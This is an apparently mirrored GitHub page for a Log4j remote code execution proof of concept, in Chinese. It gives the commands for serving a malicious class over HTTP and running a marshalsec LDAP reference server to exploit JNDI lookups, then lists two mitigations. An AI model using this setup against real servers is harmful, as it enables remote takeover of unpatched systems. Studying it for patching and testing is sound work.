NuclearMissile / apache-log4j-poc

Apache Log4j 远程代码执行

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Apache-Log4j

Apache Log4j 远程代码执行

攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响

image

cmd for macos: jdk 1.8

python3 -m http.server 8888

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

execute log4j.java

修复方案:

(1)修改jvm参数 -Dlog4j2.formatMsgNoLookups=true

(2)修改配置 在应用classpath下添加log4j2.component.properties配置文件,log4j2.formatMsgNoLookups=true

About

Apache Log4j 远程代码执行


Languages

Language:Java 100.0%